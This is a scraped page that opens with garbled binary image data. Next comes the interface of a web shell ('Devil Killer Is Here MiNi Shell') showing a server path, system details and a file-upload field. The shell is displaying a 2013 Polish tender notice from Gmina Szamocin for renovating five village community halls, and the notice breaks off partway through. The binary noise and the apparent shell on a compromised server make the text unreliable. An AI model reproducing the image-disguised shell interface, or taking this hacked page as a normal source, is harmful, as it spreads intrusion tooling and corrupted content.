JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/18296-N-2013.html

<p class="kh_header"><b>Szamocin: Remont i przebudowa świetlic wiejskich w miejscowościach Nowy Dwór, Lipa, Swoboda, Jaktorowo, Szamoty.</b><br>
<b>Numer ogłoszenia: 18296 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szamocin , Pl. Wolności 19, 64-820 Szamocin, woj. wielkopolskie, tel. 67 2848003, faks 67 2848065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaszamocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa świetlic wiejskich w miejscowościach Nowy Dwór, Lipa, Swoboda, Jaktorowo, Szamoty..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Remont i Przebudowa świetlic wiejskich w miejscowościach: Nowy Dwór, Lipa, Swoboda, Jaktorowo, Szamoty.

Nazwa i kod zamówienia wg Wspólnego Słownika 45.00.00.00-7 - ROBOTY BUDOWLANE 45.33.00.00-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne, 45.31.00.00-3 - Roboty instalacji elektrycznych

Miejsce realizacji robót:  Jaktorowo 9a - działka: nr 47 obręb ewidencyjny gmina Szamocin, Lipa 33 - działka: nr 409/1 obręb ewidencyjny gmina Szamocin, Nowy Dwór 11a - działka: nr 79/6 obręb ewidencyjny gmina Szamocin, Swoboda 10 - działka: nr 249 obręb ewidencyjny gmina Szamocin, Szamoty 17 - działka: nr 10/1 obręb ewidencyjny gmina Szamocin
Termin wykonania przedmiotu zamówienia Termin wykonania przedmiotu zamówienia ustala się na 15.07.2013 r.
OPIS PRZEDMIOTU ZAMÓWIENIA: Celem opracowania jest remont i przebudowa świetlic wiejskich w miejscowościach: Nowy Dwór, Lipa, Swoboda, Jaktorowo, Szamoty

1)	Opis prac budowlanych w ramach zadania Remont i przebudowa świetlicy wiejskiej w miejscowości Nowy Dwór:

- wymiana pokrycia dachowego na pokrycie z blachy trapezowej, powlekanej wraz z pracami blacharskimi (opierzenia, orynnowanie),
- wykonanie docieplenia konstrukcji dachowej z wymianą podsufitki na wykonanie OWA,
- ułożenie płytek podłogowych ceramicznych, cyklinowanie podłogi w sali świetlicy,
- gipsowanie, malowanie pomieszczeń, wykonanie lamperii żywicznych w sali świetlicy,
- montaż kominka w małej Sali,
- wymiana i rozwinięcie instalacji elektrycznej
- wykonanie utwardzeń, chodników z polbruku gr. 8; 6 cm,
- wymiana skrzydła drzwiowego,
- wykonanie nowej kolorystyki elewacji.

UWAGA: Zamawiający posiada następujący materiał na realizacje zadania:

Blacha płaska RAL 3009 - 10 szt.
Membrana dachowa  - 375 m2
Wkręty farmerskie 4.8x35mm - 2310 szt.
Cegła klinkierowa KOSMO - 300 szt
Gwóźdź - 10kg
Gąsior trapezowy 3005 - 14 szt
Uszczelka T-18 Eco 3005 - 52 szt.
Trapez T-18 Eco 3005 - 18,4289 m2c
Boazeria Świerk - 11,62 m2
Rynna PCV - 12szt
Uchwyt stal. Rynny prosty - 80 szt.
Złączka rynny 125 brąz - 12 szt.
Zaślepka uniw. 125 brąz - 8 szt.
Rura spustowa 100x4000 brąz - 4 szt.
Uchwyt rury spustowej 100  - 8 szt.
Kolano 100/67 brąz - 4 szt.
lej spustowy 125x100 brąz - 4 szt
kontr łata impregnowana - 464 mb
wiatrownica I 3009 - 17 szt.
lakierobejca VIDARON mah. Szlach.2,5l - 2 szt.
zaprawa do klinkieru grafit 25kg - 12 szt.
łata 4x6 impregnowana 867,9245 mb
trapez T-18 Eco 3005 246,859 m2c
silikon dekarski kolor szt. 8

Wartość tych materiałów należy odliczyć od kwoty oferty

2)	Opis prac budowlanych w ramach zadania Remont i przebudowa świetlicy wiejskiej w miejscowości Lipa:
- wykonanie rozdziału pomieszczenia ściankami działowymi w celu wydzielenia WC,
- montaż stolarki okiennej, drzwiowej w istniejących otworach (odtworzonych),
- montaż urządzeń sanitarnych, zlewozmywaka, zbiornika b.o. z tworzyw sztucznych o poj. V 3,0 m3,
- ułożenie płytek podłogowych ceramicznych,
- gipsowanie, malowanie pomieszczeń, wykonanie lamperii żywicznych w Sali świetlicy,
- montaż kominka w małej Sali,
- wymiana i rozwinięcie instalacji elektrycznej,
- wykonanie utwardzeń, chodników z polbruku gr. 8;6,

Montaż sceny letniej: Scena letnia zlokalizowana na działce nr 409/1 w Lipie.
Technologia szkieletowa-drewniana, powierzchnia zabudowy sceny 25,00 m2
Scena o konstrukcji szkieletowej z drewna sosnowego o wymiarach 5,0 x 5,0 m i wysokości 3,0 m od poziomu podłogi. Stopy fundamentowe 60 x 60 x 80 cm zakończone kotwami prefabrykowanymi z blachy ocynkowanej w celu montaży słupków drewnianych. Konstrukcję nośną stanowić będą 4 słupy drewniane o przekroju 18 x 18 cm zakończone belką oczepową. Podłoga oparta na podwalinach zamocowanych do słupów na wysokości 75 cm powyżej terenu. Belki podwali nowe o wymiarach 18 x 18 cm oparte na słupach głównych i słupkach pośrednich w rozstawie co 2,5 m. Pomiędzy belkami podwali nowymi projektuje się ruszt pod podłogę w rozstawie co ok. 70 cm, do rusztu i podwalin zamontowana podłoga sceny z desek o gr. 42 mm i szer. Ok. 12 cm mocowanych ażurowo. W celu usztywnienia belek oczepowych i słupów projektuje się miecze o wymiarach 10 x 10 cm. Zadaszenie wykonane jako dach kopertowy z krokwii o wymiarach 6 x 16 cm o kącie nachylenia połaci 30o. Konstrukcję dachową należy odeskować deskami gr. 28 mm lub płytą OSB. Pokrycie dachowe wykonać z papy termozgrzewalnej w kolorze zielonym. Przestrzeń poniżej podłogi zamaskować ażurowo deskami gr. 28 mm i szer. 12 cm. Schody drewniane oparte na dwóch policzkach drewnianych mocowanych do belki podwalinowej i stóp betonowych. Na belki policzkowe montować stopnie z desek sosnowych o szerokości stopnia 30 cm i grubości 50 mm. Dopuszcza się wykonanie jednego stopnia z dwóch desek. Maksymalna wysokość stopnia 15 cm, Szerokość biegu schodów 120 cm. Belki policzkowe montować 25 cm od krawędzi schodów. Płyta z kostki polbrukowej bezfazowej wraz z dojściem do sceny. Po obwodzie płyty należy wykonać obrzeże betonowe 6 x 20 x 100 cm ustawione na podsypce piaskowo-cementowej. Kostka polbrukowa bezfazowa gr. 6 cm ułożona na posypce piaskowej dogęszczonej gr. 15 cm. Kostka gr. 6 cm w kolorze szarym. Zmianę kolorystyki i wzoru kostki należy uzgodnić z zamawiającym.

Wyposażenie boiska: W ramach wyposażenia zostanie zamontowany piłkochwyt, ogrodzenie z furtką oraz zamontowane dwie bramki o wym. 3 x 2 m. Piłkochwyt z siatki na słupkach z rur wys. 4 m, siatka ochronna oczka 50 x 50 mm, gr. splotu 2-3 mm, polietylenowa. Ogrodzenie z siatki powlekanej wys. 2,0 m o gr. większej niż 2 mm, słupki zielone malowane proszkowo. Słupki wykonane z rury ocynkowanej. Montaż furtki stalowej 1,4 x 2,0 m w środku przęsła. Dostawa i montaż bramek do piłki ręcznej stalowe o wym. 3 x 2 wzmocnione, rama wykonana w całości, hamujące siatkę wykonane z metalu. Wszystkie elementy bramki ocynkowane ogniowo. Mocowanie bramek w tulejach.


3)	Opis prac budowlanych w ramach zadania Remont i przebudowa świetlicy wiejskiej w miejscowości Swoboda:

- cyklinowanie i lakierowanie podłogi świetlicy,
- ułożenie płytek podłogowych w pomieszczeniu zaplecza oraz WC, ułożenie płytek ceramicznych ściennych w pomieszczeniu zaplecza WC,
- gipsowanie i  malowanie pomieszczeń,
- montaż umywalek, zlewozmywaka, muszli z rozprowadzeniem sieci wodnokanalizacyjnej,
- instalacja kominka na opał stały z nadmuchem,
- wykonanie chodników o szer. 1,5 m z polbruku gr. 6 cm,
- wykonanie ocieplenia ścian zewnętrznych budynku warstwą styropianu oraz stropodachu warstwą styropapy wraz z wymianą opierzeń blacharskich,
- montaż zespołu zabawowego. 

4)	Opis prac budowlanych w ramach zadania Remont i przebudowa świetlicy wiejskiej w miejscowości Jaktorowo:

- ułożenie płytek podłogowych ceramicznych w pomieszczeniu świetlicy,
- demontaż i montaż podsufitki z płyty GKF na stelażu systemowym,
- gipsowanie i malowanie pomieszczeń,
- wymiana stolarki okiennej oraz drzwiowej,
- instalacja kominka na opał stały z nadmuchem,
- remont instalacji wodno-kanalizacyjnej oraz elektrycznej,
- wykonanie utwardzeń, chodników o szer. 1,5 m z polbruku gr. 6 cm,
- wykonanie docieplenia stropodachu warstwą syropapy.

5)	Opis prac budowlanych w ramach zadania Remont i przebudowa świetlicy wiejskiej w miejscowości Szamoty:

- przebudowa zaplecza świetlicy, rozebranie ścianki działowej z przemurowaniem wg nowego podziału w celu wydzielenia WC,
- ułożenie płytek podłogowych, ściennych ceramicznych w pomieszczeniu WC, zaplecza,
- gipsowanie i malowanie pomieszczeń,
- wymiana stolarki okiennej oraz drzwiowej wraz odtworzeniem otworu drzwiowego,
- wymiana i rozwinięcie instalacji wodno-kanalizacyjnej oraz elektrycznej,
- wykonanie utwardzeń, chodników o szer. 1,5 m z polbruku gr. 6 cm,
- montaż zbiornika b.o. z tworzyw sztucznych o poj. 3,0 m3,
- wymiana i montaż bram wjazdowych,
- wykonanie docieplenia stropodachu warstwą styropapy na segmencie zaplecza świetlicy.

UWAGA: Zamawiający posiada następujący materiał na realizacje zadania
1) okna PCV szt. 2,  wym. 150 x 153 cm, 80 x 53 cm    

Wartość tych materiałów należy odliczyć od kwoty oferty.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli konieczność robót dodatkowych wynika z decyzji organów nadzoru budowlanego lub jest następstwem błędów lub zaniedbań Wykonawcy, prace takie 
zostaną wykonane  przez Wykonawcę bez dodatkowego wynagrodzenia w   
terminach wynikających z wydanej decyzji i obowiązującej umowy.
2.W przypadku konieczności udzielenia dotychczasowemu wykonawcy robót 
dodatkowych nieobjętych zamówieniem podstawowym maj ą zastosowanie 
przepisy art. 67. ust. l, pkt 5 PZP. Wykonawca takich prac zobowiązany jest 
wykonać je przy zachowaniu tych samych  stawek kalkulacyjnych, norm, 
parametrów i standardów, po podpisaniu przez obie strony 
umowy ustalającej zakres rzeczowy, finansowy i termin wykonania.
3. Wynagrodzenie za roboty, o których mowa w ust.2 będzie ustalone kosztorysem 
powykonawczym potwierdzonym przez Zamawiającego i Inspektora Nadzoru.
4. Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenia 
niezbędnego, uzasadnionego zamówienia uzupełniającego, zgodnie z przepisami zapisanymi w art. 41, pkt. 15 i art. 67 ust. l pkt 6 i 7 ustawy PZP. 

Określa się wartość zamówienia uzupełniającego do 50% wartości umowy 
 podstawowej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości: 15.000,00 PLN
    (słownie: piętnaście tysięcy złotych 00/100 złotych).
2. Wadium może być wniesione w formach przewidzianych w art. 45 ust. 6 ustawy, tj.
-    pieniądzu,
-    poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
     oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
     poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zmianami).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
    Zamawiającego  BS Chodzież O/Szamocin, Nr  39894500023900010120000020.
4.  Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku 
     bankowym.
5. W przypadku wniesienia wadium w formie gwarancji z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6. W przypadku wadium wnoszonego w innych dopuszczonych przez zamawiającego 
    formach Wykonawca winien dołączyć oryginał dokumentu potwierdzającego 
    wniesienie wadium do oferty lub złożyć oryginał w kasie Urzędu  a do oferty    
    dołączyć w sposób trwały kopię dokumentu posiadającego potwierdzenie 
    (dokonane przez kasjera) złożenia w kasie wadium.
7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną 
    formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana 
    za odrzuconą.
8. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na 
    rzecz Zamawiającego w przypadku, gdy:
a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na 
    zasadach określonych w specyfikacji istotnych warunków zamówienia,
c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie 
    wykonawcy.
9. Wadium należy wnieść przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy załączyć kopie uprawnień do wykonywania określonej działalności jeżeli przepisy prawa nakładają taki obowiązek ich posiadania. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>realizowali w ciągu ostatnich 5 lat co najmniej 1 zamówienie odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Za robotę budowlaną o podobnym zakresie i wartości zamawiający uzna budowę, przebudowę lub rozbudowę budynku użyteczności publicznej o  wartości nie mniejszej niż  przedmiot zamówienia udokumentowana referencjami  i   kopią  protokołu bezusterkowego  odbioru od  Inwestora. 
W celu potwierdzenia powyższego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych robót zgodnie z załącznikiem nr 4 do SIWZ. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeśli dysponują sprzętem budowlanym, środkami transportu i urządzeniami technicznymi  w ilościach i o parametrach niezbędnych do realizacji zamówienia,  zgodnie z nakładami kosztorysu ofertowego, projektem budowlanym.- dysponują lub będą dysponować osobą pełniącą funkcję kierownika robót. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć wykaz osób zgodnie z załącznikiem nr 5 do SIWZ Potencjał kadrowy i załączyć kserokopie uprawnień oraz zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa lub innej izby samorządu zawodowego oraz informacje o podstawie dysponowania tymi osobami. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeśli posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
     Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie  dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Spełnienie tego warunku udziału w postępowaniu zamawiający oceni zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
